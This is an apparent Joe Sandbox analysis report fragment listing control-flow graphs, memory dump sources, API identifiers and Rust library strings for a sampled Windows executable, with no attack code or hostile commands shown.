7ff71a80d971-7ff71a80d9a5 call 7ff71a807d7a 3949->3959 3960 7ff71a80e225-7ff71a80e231 3949->3960 3950->3949 3952->3943 3964 7ff71a80d9a7-7ff71a80d9af 3959->3964 3965 7ff71a80da23-7ff71a80da38 3959->3965 3961 7ff71a80e24c-7ff71a80e277 3960->3961 3968 7ff71a80da4e-7ff71a80da81 memcpy 3964->3968 3969 7ff71a80d9b5-7ff71a80d9e1 call 7ff71a84d840 call 7ff71a807d7a 3964->3969 3966 7ff71a80da3e-7ff71a80da4c 3965->3966 3967 7ff71a80daef 3965->3967 3970 7ff71a80daac-7ff71a80dab1 call 7ff71a7ac510 3966->3970 3973 7ff71a80daf1-7ff71a80dafe call 7ff71a84d4e1 3967->3973 3968->3967 3971 7ff71a80da83-7ff71a80da8a 3968->3971 3975 7ff71a80da8c-7ff71a80da9c 3969->3975 3986 7ff71a80d9e7-7ff71a80d9ea 3969->3986 3980 7ff71a80dab6-7ff71a80dae9 memcpy 3970->3980 3971->3975 3973->3960 3982 7ff71a80db04-7ff71a80db4d memcpy * 2 3973->3982 3975->3967 3979 7ff71a80da9e-7ff71a80daa5 3975->3979 3979->3970 3980->3920 3980->3967 3984 7ff71a80e233-7ff71a80e240 call 7ff71a807c2b 3982->3984 3985 7ff71a80db53-7ff71a80dc3a memcpy call 7ff71a7d6ed7 call 7ff71a810be3 3982->3985 3993 7ff71a80e248-7ff71a80e24a 3984->3993 3994 7ff71a80e243 call 7ff71a80c06e 3984->3994 3997 7ff71a80dc3c-7ff71a80dc5b call 7ff71a7d6ed7 call 7ff71a810be3 3985->3997 3998 7ff71a80dc5d-7ff71a80dc6b 3985->3998 3986->3980 3989 7ff71a80d9f0-7ff71a80da00 3986->3989 3989->3973 3992 7ff71a80da06-7ff71a80da1e 3989->3992 3992->3973 3993->3961 3994->3993 3997->3998 4014 7ff71a80dc8e-7ff71a80dc99 call 7ff71a810bf3 3997->4014 4000 7ff71a80dc6d-7ff71a80dc8c call 7ff71a7d6ed7 call 7ff71a810be3 3998->4000 4001 7ff71a80dc9e-7ff71a80dcd3 3998->4001 4000->4001 4000->4014 4002 7ff71a80dcd8-7ff71a80dce8 call 7ff71a7c1c34 4001->4002 4012 7ff71a80dcee-7ff71a80dd03 call 7ff71a7b4bd8 4002->4012 4013 7ff71a80df46-7ff71a80df61 call 7ff71a810586 4002->4013 4024 7ff71a80dd09-7ff71a80dd53 call 7ff71a7c9690 4012->4024 4025 7ff71a80eb3d-7ff71a80eb61 call 7ff71a7ade90 4012->4025 4022 7ff71a80df63-7ff71a80df73 call 7ff71a8157e7 4013->4022 4023 7ff71a80dfd4-7ff71a80dff7 4013->4023 4021 7ff71a80df80-7ff71a80dfcf call 7ff71a808050 call 7ff71a7d59c1 call 7ff71a7d597e 4014->4021 4021->3922 4021->3993 4022->4021 4041 7ff71a80df7b call 7ff71a810b92 4022->4041 4026 7ff71a80e09a-7ff71a80e0bf 4023->4026 4027 7ff71a80dffd-7ff71a80e036 4023->4027 4042 7ff71a80dd58 4024->4042 4025->3947 4034 7ff71a80e0c7-7ff71a80e0cf 4026->4034 4032 7ff71a80e038-7ff71a80e06e call 7ff71a7aacb3 4027->4032 4033 7ff71a80e071-7ff71a80e098 4027->4033 4032->4033 4033->4034 4034->3884 4039 7ff71a80e0d5-7ff71a80e0f4 call 7ff71a7cd321 4034->4039 4039->3884 4052 7ff71a80e0fa-7ff71a80e126 call 7ff71a7b561d 4039->4052 4041->4021 4043 7ff71a80dd5b-7ff71a80dd66 4042->4043 4043->4043 4047 7ff71a80dd68-7ff71a80dd74 4043->4047 4050 7ff71a80dd7a-7ff71a80dd8e 4047->4050 4051 7ff71a80de0b-7ff71a80de6a call 7ff71a7c4ec2 4047->4051 4050->4051 4054 7ff71a80dd90-7ff71a80dd93 4050->4054 4061 7ff71a80de6c-7ff71a80dea3 4051->4061 4052->3884 4064 7ff71a80e12c-7ff71a80e152 4052->4064 4057 7ff71a80de00-7ff71a80de06 4054->4057 4058 7ff71a80dd95-7ff71a80dd98 4054->4058 4057->4042 4062 7ff71a80eb2b-7ff71a80eb38 call 7ff71a7ab670 4058->4062 4063 7ff71a80dd9e-7ff71a80ddb9 4058->4063 4065 7ff71a80df23-7ff71a80df2d 4061->4065 4066 7ff71a80dea5-7ff71a80df1e call 7ff71a7e1019 call 7ff71a7ca933 4061->4066 4062->4025 4063->4057 4068 7ff71a80ddbb-7ff71a80ddc6 4063->4068 4069 7ff71a80e15a-7ff71a80e15d 4064->4069 4065->4002 4066->4065 4071 7ff71a80ddc8-7ff71a80ddeb call 7ff71a7aaee1 4068->4071 4072 7ff71a80ddf2-7ff71a80ddfa 4068->4072 4069->3884 4073 7ff71a80e163-7ff71a80e1b9 call 7ff71a7dab44 call 7ff71a7e5892 4069->4073 4071->4057 4080 7ff71a80dded 4071->4080 4072->4057 4076 7ff71a80df32-7ff71a80df41 4072->4076 4085 7ff71a80e1bb-7ff71a80e28e 4073->4085 4086 7ff71a80e212-7ff71a80e220 4073->4086 4076->4061 4080->4076 4088 7ff71a80e291 4085->4088 4086->4069 4088->4088
                APIs
                Strings
                • httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
                • API String ID: 3510742995-2841460514
                • Opcode ID: 9c5260df02497e11d052b730d8a91ad21b9df45a120170834e6cdb7285e18642
                • Instruction ID: 45165a59b787e643e27d19efd7d1f55bad32512aff11aef639e3955a19db307e
                • Opcode Fuzzy Hash: 9c5260df02497e11d052b730d8a91ad21b9df45a120170834e6cdb7285e18642
                • Instruction Fuzzy Hash: 1D528B32608FC585EB25AB15E4447EEB3A4FB89794F844126DB8D17B89DF3CD25AC700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4089 7ff71a80e336-7ff71a80e353 call 7ff71a7dab6f 4092 7ff71a80e367 4089->4092 4093 7ff71a80e355-7ff71a80e362 call 7ff71a815873 4089->4093 4095 7ff71a80e36f-7ff71a80e377 4092->4095 4093->4095 4096 7ff71a80e3d7-7ff71a80e452 call 7ff71a7c5402 call 7ff71a810cc3 call 7ff71a7b5c0a call 7ff71a810d7b 4095->4096 4097 7ff71a80e379-7ff71a80e3d2 call 7ff71a7ca149 call 7ff71a7da73e 4095->4097 4111 7ff71a80e47a-7ff71a80e53f memcpy call 7ff71a810eb4 call 7ff71a810f2b call 7ff71a810f70 call 7ff71a7d59c1 4096->4111 4112 7ff71a80e454-7ff71a80e475 memcpy 4096->4112 4097->4096 4120 7ff71a80e544-7ff71a80e573 memcpy call 7ff71a81125f 4111->4120 4112->4111 4122 7ff71a80e578-7ff71a80e596 4120->4122 4123 7ff71a80e598 4122->4123 4124 7ff71a80e59f-7ff71a80e5aa 4122->4124 4123->4124 4125 7ff71a80e61b-7ff71a80e637 4124->4125 4126 7ff71a80e5ac-7ff71a80e5c2 4124->4126 4129 7ff71a80e63d-7ff71a80e6b0 4125->4129 4130 7ff71a80eb8f 4125->4130 4127 7ff71a80e5cb-7ff71a80e5ee call 7ff71a850505 4126->4127 4128 7ff71a80e5c4 4126->4128 4127->4125 4136 7ff71a80e5f0-7ff71a80e618 call 7ff71a7d542d 4127->4136 4128->4127 4133 7ff71a80e6b5-7ff71a80e7e5 memcpy call 7ff71a84ada3 4129->4133 4131 7ff71a80eb91-7ff71a80eb98 4130->4131 4138 7ff71a80eb6a-7ff71a80eb77 call 7ff71a80eb9a 4133->4138 4139 7ff71a80e7eb-7ff71a80e92e call 7ff71a84e873 memcpy 4133->4139 4136->4125 4148 7ff71a80eb79-7ff71a80eb83 4138->4148 4146 7ff71a80eaec-7ff71a80eaf9 call 7ff71a80eb9a 4139->4146 4147 7ff71a80e934-7ff71a80e943 4139->4147 4154 7ff71a80eafc-7ff71a80eb02 4146->4154 4147->4130 4149 7ff71a80e949-7ff71a80eadd call 7ff71a7d542d memcpy call 7ff71a7d9744 4147->4149 4148->4130 4150 7ff71a80eb8a call 7ff71a7d973a 4148->4150 4149->4154 4163 7ff71a80eadf-7ff71a80eaea call 7ff71a84fc3d 4149->4163 4150->4130 4157 7ff71a80eb04-7ff71a80eb14 4154->4157 4158 7ff71a80eb66-7ff71a80eb68 4154->4158 4160 7ff71a80eb21-7ff71a80eb26 call 7ff71a7d5699 4157->4160 4161 7ff71a80eb16-7ff71a80eb1b 4157->4161 4158->4148 4170 7ff71a80d971-7ff71a80d9a5 call 7ff71a807d7a 4160->4170 4171 7ff71a80e225-7ff71a80e231 4160->4171 4161->4160 4163->4154 4175 7ff71a80d9a7-7ff71a80d9af 4170->4175 4176 7ff71a80da23-7ff71a80da38 4170->4176 4172 7ff71a80e24c-7ff71a80e277 4171->4172 4179 7ff71a80da4e-7ff71a80da81 memcpy 4175->4179 4180 7ff71a80d9b5-7ff71a80d9e1 call 7ff71a84d840 call 7ff71a807d7a 4175->4180 4177 7ff71a80da3e-7ff71a80da4c 4176->4177 4178 7ff71a80daef 4176->4178 4181 7ff71a80daac-7ff71a80dab1 call 7ff71a7ac510 4177->4181 4184 7ff71a80daf1-7ff71a80dafe call 7ff71a84d4e1 4178->4184 4179->4178 4182 7ff71a80da83-7ff71a80da8a 4179->4182 4186 7ff71a80da8c-7ff71a80da9c 4180->4186 4197 7ff71a80d9e7-7ff71a80d9ea 4180->4197 4191 7ff71a80dab6-7ff71a80dae9 memcpy 4181->4191 4182->4186 4184->4171 4193 7ff71a80db04-7ff71a80db4d memcpy * 2 4184->4193 4186->4178 4190 7ff71a80da9e-7ff71a80daa5 4186->4190 4190->4181 4191->4131 4191->4178 4195 7ff71a80e233-7ff71a80e240 call 7ff71a807c2b 4193->4195 4196 7ff71a80db53-7ff71a80dc3a memcpy call 7ff71a7d6ed7 call 7ff71a810be3 4193->4196 4204 7ff71a80e248-7ff71a80e24a 4195->4204 4205 7ff71a80e243 call 7ff71a80c06e 4195->4205 4208 7ff71a80dc3c-7ff71a80dc5b call 7ff71a7d6ed7 call 7ff71a810be3 4196->4208 4209 7ff71a80dc5d-7ff71a80dc6b 4196->4209 4197->4191 4200 7ff71a80d9f0-7ff71a80da00 4197->4200 4200->4184 4203 7ff71a80da06-7ff71a80da1e 4200->4203 4203->4184 4204->4172 4205->4204 4208->4209 4225 7ff71a80dc8e-7ff71a80dc99 call 7ff71a810bf3 4208->4225 4211 7ff71a80dc6d-7ff71a80dc8c call 7ff71a7d6ed7 call 7ff71a810be3 4209->4211 4212 7ff71a80dc9e-7ff71a80dcd3 4209->4212 4211->4212 4211->4225 4213 7ff71a80dcd8-7ff71a80dce8 call 7ff71a7c1c34 4212->4213 4223 7ff71a80dcee-7ff71a80dd03 call 7ff71a7b4bd8 4213->4223 4224 7ff71a80df46-7ff71a80df61 call 7ff71a810586 4213->4224 4235 7ff71a80dd09-7ff71a80dd53 call 7ff71a7c9690 4223->4235 4236 7ff71a80eb3d-7ff71a80eb61 call 7ff71a7ade90 4223->4236 4233 7ff71a80df63-7ff71a80df73 call 7ff71a8157e7 4224->4233 4234 7ff71a80dfd4-7ff71a80dff7 4224->4234 4232 7ff71a80df80-7ff71a80dfcf call 7ff71a808050 call 7ff71a7d59c1 call 7ff71a7d597e 4225->4232 4232->4133 4232->4204 4233->4232 4252 7ff71a80df7b call 7ff71a810b92 4233->4252 4237 7ff71a80e09a-7ff71a80e0bf 4234->4237 4238 7ff71a80dffd-7ff71a80e036 4234->4238 4253 7ff71a80dd58 4235->4253 4236->4158 4245 7ff71a80e0c7-7ff71a80e0cf 4237->4245 4243 7ff71a80e038-7ff71a80e06e call 7ff71a7aacb3 4238->4243 4244 7ff71a80e071-7ff71a80e098 4238->4244 4243->4244 4244->4245 4245->4096 4250 7ff71a80e0d5-7ff71a80e0f4 call 7ff71a7cd321 4245->4250 4250->4096 4263 7ff71a80e0fa-7ff71a80e126 call 7ff71a7b561d 4250->4263 4252->4232 4254 7ff71a80dd5b-7ff71a80dd66 4253->4254 4254->4254 4258 7ff71a80dd68-7ff71a80dd74 4254->4258 4261 7ff71a80dd7a-7ff71a80dd8e 4258->4261 4262 7ff71a80de0b-7ff71a80de6a call 7ff71a7c4ec2 4258->4262 4261->4262 4265 7ff71a80dd90-7ff71a80dd93 4261->4265 4272 7ff71a80de6c-7ff71a80dea3 4262->4272 4263->4096 4275 7ff71a80e12c-7ff71a80e152 4263->4275 4268 7ff71a80de00-7ff71a80de06 4265->4268 4269 7ff71a80dd95-7ff71a80dd98 4265->4269 4268->4253 4273 7ff71a80eb2b-7ff71a80eb38 call 7ff71a7ab670 4269->4273 4274 7ff71a80dd9e-7ff71a80ddb9 4269->4274 4276 7ff71a80df23-7ff71a80df2d 4272->4276 4277 7ff71a80dea5-7ff71a80df1e call 7ff71a7e1019 call 7ff71a7ca933 4272->4277 4273->4236 4274->4268 4279 7ff71a80ddbb-7ff71a80ddc6 4274->4279 4280 7ff71a80e15a-7ff71a80e15d 4275->4280 4276->4213 4277->4276 4282 7ff71a80ddc8-7ff71a80ddeb call 7ff71a7aaee1 4279->4282 4283 7ff71a80ddf2-7ff71a80ddfa 4279->4283 4280->4096 4284 7ff71a80e163-7ff71a80e1b9 call 7ff71a7dab44 call 7ff71a7e5892 4280->4284 4282->4268 4291 7ff71a80dded 4282->4291 4283->4268 4287 7ff71a80df32-7ff71a80df41 4283->4287 4296 7ff71a80e1bb-7ff71a80e28e 4284->4296 4297 7ff71a80e212-7ff71a80e220 4284->4297 4287->4272 4291->4287 4299 7ff71a80e291 4296->4299 4297->4280 4299->4299
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
                • API String ID: 3510742995-2841460514
                • Opcode ID: 0185682a56fb4bd25d6a01511275e25dae048139d2c582cadeb00ece60d8bc56
                • Instruction ID: cc23be55b08a4088fbce6f28881c0d428d3353ec833bb66376bb709aa349b39b
                • Opcode Fuzzy Hash: 0185682a56fb4bd25d6a01511275e25dae048139d2c582cadeb00ece60d8bc56
                • Instruction Fuzzy Hash: 04428A32608FC585EB26AB15E4447EEB3A4FB89B94F844126DB8D17B89DF3CD259C700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 4300 7ff71a80e2ae-7ff71a80e377 call 7ff71a815873 4305 7ff71a80e3d7-7ff71a80e452 call 7ff71a7c5402 call 7ff71a810cc3 call 7ff71a7b5c0a call 7ff71a810d7b 4300->4305 4306 7ff71a80e379-7ff71a80e3d2 call 7ff71a7ca149 call 7ff71a7da73e 4300->4306 4318 7ff71a80e47a-7ff71a80e53f memcpy call 7ff71a810eb4 call 7ff71a810f2b call 7ff71a810f70 call 7ff71a7d59c1 4305->4318 4319 7ff71a80e454-7ff71a80e475 memcpy 4305->4319 4306->4305 4327 7ff71a80e544-7ff71a80e573 memcpy call 7ff71a81125f 4318->4327 4319->4318 4329 7ff71a80e578-7ff71a80e596 4327->4329 4330 7ff71a80e598 4329->4330 4331 7ff71a80e59f-7ff71a80e5aa 4329->4331 4330->4331 4332 7ff71a80e61b-7ff71a80e637 4331->4332 4333 7ff71a80e5ac-7ff71a80e5c2 4331->4333 4336 7ff71a80e63d-7ff71a80e6b0 4332->4336 4337 7ff71a80eb8f 4332->4337 4334 7ff71a80e5cb-7ff71a80e5ee call 7ff71a850505 4333->4334 4335 7ff71a80e5c4 4333->4335 4334->4332 4343 7ff71a80e5f0-7ff71a80e618 call 7ff71a7d542d 4334->4343 4335->4334 4340 7ff71a80e6b5-7ff71a80e7e5 memcpy call 7ff71a84ada3 4336->4340 4338 7ff71a80eb91-7ff71a80eb98 4337->4338 4345 7ff71a80eb6a-7ff71a80eb77 call 7ff71a80eb9a 4340->4345 4346 7ff71a80e7eb-7ff71a80e92e call 7ff71a84e873 memcpy 4340->4346 4343->4332 4355 7ff71a80eb79-7ff71a80eb83 4345->4355 4353 7ff71a80eaec-7ff71a80eaf9 call 7ff71a80eb9a 4346->4353 4354 7ff71a80e934-7ff71a80e943 4346->4354 4361 7ff71a80eafc-7ff71a80eb02 4353->4361 4354->4337 4356 7ff71a80e949-7ff71a80eadd call 7ff71a7d542d memcpy call 7ff71a7d9744 4354->4356 4355->4337 4357 7ff71a80eb8a call 7ff71a7d973a 4355->4357 4356->4361 4370 7ff71a80eadf-7ff71a80eaea call 7ff71a84fc3d 4356->4370 4357->4337 4364 7ff71a80eb04-7ff71a80eb14 4361->4364 4365 7ff71a80eb66-7ff71a80eb68 4361->4365 4367 7ff71a80eb21-7ff71a80eb26 call 7ff71a7d5699 4364->4367 4368 7ff71a80eb16-7ff71a80eb1b 4364->4368 4365->4355 4377 7ff71a80d971-7ff71a80d9a5 call 7ff71a807d7a 4367->4377 4378 7ff71a80e225-7ff71a80e231 4367->4378 4368->4367 4370->4361 4382 7ff71a80d9a7-7ff71a80d9af 4377->4382 4383 7ff71a80da23-7ff71a80da38 4377->4383 4379 7ff71a80e24c-7ff71a80e277 4378->4379 4386 7ff71a80da4e-7ff71a80da81 memcpy 4382->4386 4387 7ff71a80d9b5-7ff71a80d9e1 call 7ff71a84d840 call 7ff71a807d7a 4382->4387 4384 7ff71a80da3e-7ff71a80da4c 4383->4384 4385 7ff71a80daef 4383->4385 4388 7ff71a80daac-7ff71a80dab1 call 7ff71a7ac510 4384->4388 4391 7ff71a80daf1-7ff71a80dafe call 7ff71a84d4e1 4385->4391 4386->4385 4389 7ff71a80da83-7ff71a80da8a 4386->4389 4393 7ff71a80da8c-7ff71a80da9c 4387->4393 4404 7ff71a80d9e7-7ff71a80d9ea 4387->4404 4398 7ff71a80dab6-7ff71a80dae9 memcpy 4388->4398 4389->4393 4391->4378 4400 7ff71a80db04-7ff71a80db4d memcpy * 2 4391->4400 4393->4385 4397 7ff71a80da9e-7ff71a80daa5 4393->4397 4397->4388 4398->4338 4398->4385 4402 7ff71a80e233-7ff71a80e240 call 7ff71a807c2b 4400->4402 4403 7ff71a80db53-7ff71a80dc3a memcpy call 7ff71a7d6ed7 call 7ff71a810be3 4400->4403 4411 7ff71a80e248-7ff71a80e24a 4402->4411 4412 7ff71a80e243 call 7ff71a80c06e 4402->4412 4415 7ff71a80dc3c-7ff71a80dc5b call 7ff71a7d6ed7 call 7ff71a810be3 4403->4415 4416 7ff71a80dc5d-7ff71a80dc6b 4403->4416 4404->4398 4407 7ff71a80d9f0-7ff71a80da00 4404->4407 4407->4391 4410 7ff71a80da06-7ff71a80da1e 4407->4410 4410->4391 4411->4379 4412->4411 4415->4416 4432 7ff71a80dc8e-7ff71a80dc99 call 7ff71a810bf3 4415->4432 4418 7ff71a80dc6d-7ff71a80dc8c call 7ff71a7d6ed7 call 7ff71a810be3 4416->4418 4419 7ff71a80dc9e-7ff71a80dcd3 4416->4419 4418->4419 4418->4432 4420 7ff71a80dcd8-7ff71a80dce8 call 7ff71a7c1c34 4419->4420 4430 7ff71a80dcee-7ff71a80dd03 call 7ff71a7b4bd8 4420->4430 4431 7ff71a80df46-7ff71a80df61 call 7ff71a810586 4420->4431 4442 7ff71a80dd09-7ff71a80dd53 call 7ff71a7c9690 4430->4442 4443 7ff71a80eb3d-7ff71a80eb61 call 7ff71a7ade90 4430->4443 4440 7ff71a80df63-7ff71a80df73 call 7ff71a8157e7 4431->4440 4441 7ff71a80dfd4-7ff71a80dff7 4431->4441 4439 7ff71a80df80-7ff71a80dfcf call 7ff71a808050 call 7ff71a7d59c1 call 7ff71a7d597e 4432->4439 4439->4340 4439->4411 4440->4439 4459 7ff71a80df7b call 7ff71a810b92 4440->4459 4444 7ff71a80e09a-7ff71a80e0bf 4441->4444 4445 7ff71a80dffd-7ff71a80e036 4441->4445 4460 7ff71a80dd58 4442->4460 4443->4365 4452 7ff71a80e0c7-7ff71a80e0cf 4444->4452 4450 7ff71a80e038-7ff71a80e06e call 7ff71a7aacb3 4445->4450 4451 7ff71a80e071-7ff71a80e098 4445->4451 4450->4451 4451->4452 4452->4305 4457 7ff71a80e0d5-7ff71a80e0f4 call 7ff71a7cd321 4452->4457 4457->4305 4470 7ff71a80e0fa-7ff71a80e126 call 7ff71a7b561d 4457->4470 4459->4439 4461 7ff71a80dd5b-7ff71a80dd66 4460->4461 4461->4461 4465 7ff71a80dd68-7ff71a80dd74 4461->4465 4468 7ff71a80dd7a-7ff71a80dd8e 4465->4468 4469 7ff71a80de0b-7ff71a80de6a call 7ff71a7c4ec2 4465->4469 4468->4469 4472 7ff71a80dd90-7ff71a80dd93 4468->4472 4479 7ff71a80de6c-7ff71a80dea3 4469->4479 4470->4305 4482 7ff71a80e12c-7ff71a80e152 4470->4482 4475 7ff71a80de00-7ff71a80de06 4472->4475 4476 7ff71a80dd95-7ff71a80dd98 4472->4476 4475->4460 4480 7ff71a80eb2b-7ff71a80eb38 call 7ff71a7ab670 4476->4480 4481 7ff71a80dd9e-7ff71a80ddb9 4476->4481 4483 7ff71a80df23-7ff71a80df2d 4479->4483 4484 7ff71a80dea5-7ff71a80df1e call 7ff71a7e1019 call 7ff71a7ca933 4479->4484 4480->4443 4481->4475 4486 7ff71a80ddbb-7ff71a80ddc6 4481->4486 4487 7ff71a80e15a-7ff71a80e15d 4482->4487 4483->4420 4484->4483 4489 7ff71a80ddc8-7ff71a80ddeb call 7ff71a7aaee1 4486->4489 4490 7ff71a80ddf2-7ff71a80ddfa 4486->4490 4487->4305 4491 7ff71a80e163-7ff71a80e1b9 call 7ff71a7dab44 call 7ff71a7e5892 4487->4491 4489->4475 4498 7ff71a80dded 4489->4498 4490->4475 4494 7ff71a80df32-7ff71a80df41 4490->4494 4503 7ff71a80e1bb-7ff71a80e28e 4491->4503 4504 7ff71a80e212-7ff71a80e220 4491->4504 4494->4479 4498->4494 4506 7ff71a80e291 4503->4506 4504->4487 4506->4506
                APIs
                Strings
                • httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs
                • API String ID: 3510742995-2841460514
                • Opcode ID: 969cb3c720e553bcd93b746ddc46fae0d967e28293c8d6d9e2067511cbea0a33
                • Instruction ID: 8cf7c6c60a96cc39a58b3a381e46319801e1dc28cf99d3f079ea4afe7f34ad3f
                • Opcode Fuzzy Hash: 969cb3c720e553bcd93b746ddc46fae0d967e28293c8d6d9e2067511cbea0a33
                • Instruction Fuzzy Hash: 43428A32608FC585EB61AB15E4447EEB3A4FB89B94F844126DB8D17B89DF3CD25AC700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: CompletionCreatePortmemcpymemset
                • String ID: $=$Failed to `Enter::block_on`$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                • API String ID: 1513132611-2342378900
                • Opcode ID: f506b5b00194d0f6bc72fd8d46d3559b8fdbda128bbda6c04036f8d7b98ab549
                • Instruction ID: 03d4bc040d42ea67e2aab706370a8f7c13276ce68f1f99227daaa1a648e82174
                • Opcode Fuzzy Hash: f506b5b00194d0f6bc72fd8d46d3559b8fdbda128bbda6c04036f8d7b98ab549
                • Instruction Fuzzy Hash: 5813AD32A08FC185F762AB15E5443EAB3A4FB88794F808276DA8D07795DF3CE569C710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 6296 7ff71a7e29fc-7ff71a7e2a29 call 7ff71a859f80 6299 7ff71a7e2a2b-7ff71a7e2a2e 6296->6299 6300 7ff71a7e2a67-7ff71a7e2acc 6296->6300 6301 7ff71a7e2a34-7ff71a7e2a59 6299->6301 6302 7ff71a7e3b26-7ff71a7e3b39 call 7ff71a7b1d80 * 2 6299->6302 6305 7ff71a7e2ace-7ff71a7e2ae4 call 7ff71a7cd321 6300->6305 6306 7ff71a7e2af7-7ff71a7e2af9 6300->6306 6301->6300 6317 7ff71a7e3b3e-7ff71a7e3b6e call 7ff71a7aef70 call 7ff71a7b1d80 * 2 6302->6317 6308 7ff71a7e2aff-7ff71a7e2b09 6305->6308 6319 7ff71a7e2ae6-7ff71a7e2af2 6305->6319 6307 7ff71a7e2be0-7ff71a7e2be7 6306->6307 6306->6308 6314 7ff71a7e2bec-7ff71a7e2bfa call 7ff71a7cd29b 6307->6314 6311 7ff71a7e2b56-7ff71a7e2b62 6308->6311 6312 7ff71a7e2b0b-7ff71a7e2b1a call 7ff71a7c61c0 6308->6312 6311->6314 6312->6311 6323 7ff71a7e2b1c-7ff71a7e2b43 call 7ff71a7c69bc 6312->6323 6325 7ff71a7e2c06-7ff71a7e2c12 6314->6325 6326 7ff71a7e2bfc-7ff71a7e2c01 6314->6326 6319->6314 6336 7ff71a7e2c44-7ff71a7e2c67 call 7ff71a7cd321 6323->6336 6337 7ff71a7e2b49-7ff71a7e2b51 6323->6337 6327 7ff71a7e2c6a-7ff71a7e2cb6 call 7ff71a851c48 call 7ff71a7e5382 6325->6327 6330 7ff71a7e38b2-7ff71a7e38c6 call 7ff71a7d5994 6326->6330 6348 7ff71a7e2cbe-7ff71a7e2cde call 7ff71a851bca 6327->6348 6343 7ff71a7e3921-7ff71a7e394f call 7ff71a7e47d2 call 7ff71a7da6ef 6330->6343 6336->6327 6337->6327 6353 7ff71a7e3952-7ff71a7e396e 6343->6353 6354 7ff71a7e2ce0-7ff71a7e2cf6 6348->6354 6355 7ff71a7e2cfa 6348->6355 6354->6348 6356 7ff71a7e2cf8 6354->6356 6357 7ff71a7e2cfc-7ff71a7e2d19 call 7ff71a7aed70 6355->6357 6356->6357 6360 7ff71a7e2d1f-7ff71a7e2d39 call 7ff71a7aede0 6357->6360 6361 7ff71a7e2e2c-7ff71a7e2e86 call 7ff71a7c16bd 6357->6361 6366 7ff71a7e2f10-7ff71a7e2f7a call 7ff71a7c16bd 6360->6366 6367 7ff71a7e2d3f-7ff71a7e2de6 call 7ff71a7e3b70 call 7ff71a815c34 6360->6367 6368 7ff71a7e2f81-7ff71a7e2f8f 6361->6368 6366->6368 6394 7ff71a7e2dea-7ff71a7e2e1c 6367->6394 6371 7ff71a7e2f94-7ff71a7e2fc8 6368->6371 6374 7ff71a7e2ffd-7ff71a7e3029 6371->6374 6375 7ff71a7e2fca-7ff71a7e2ff8 call 7ff71a7cd833 6371->6375 6376 7ff71a7e30c6-7ff71a7e30c8 6374->6376 6377 7ff71a7e302f-7ff71a7e3031 6374->6377 6385 7ff71a7e3402-7ff71a7e3480 memcpy * 3 6375->6385 6381 